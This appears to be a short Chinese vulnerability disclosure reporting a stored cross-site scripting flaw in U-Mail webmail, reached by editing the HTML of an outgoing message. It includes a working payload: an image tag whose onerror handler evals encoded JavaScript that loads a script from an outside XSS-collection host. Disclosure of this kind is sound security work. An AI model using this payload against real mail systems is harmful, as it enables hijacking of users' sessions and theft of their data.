### 简要描述:
U-Mail最新版某处处理不当,导致存储型xss漏洞
### 详细说明:
打开邮箱,发信
[<img src="https://images.seebug.org/upload/201405/12223416e86b42094c4bfb4391eae7018ea06545.jpg" alt="dea73564-1f57-4d28-b8b3-eb19a9bbb716.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12223416e86b42094c4bfb4391eae7018ea06545.jpg)
编辑html代码,漏洞测试代码为
```
<img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.hk%2FytcXRW%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>
```
测试结果
[<img src="https://images.seebug.org/upload/201405/12223455fdd9cfac96fd29fb080975cb87754b75.jpg" alt="2c8ee5df-acdb-4cd1-b4e9-548c3e5a8804.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/12223455fdd9cfac96fd29fb080975cb87754b75.jpg)
### 漏洞证明:
如上详细说明
暂无评论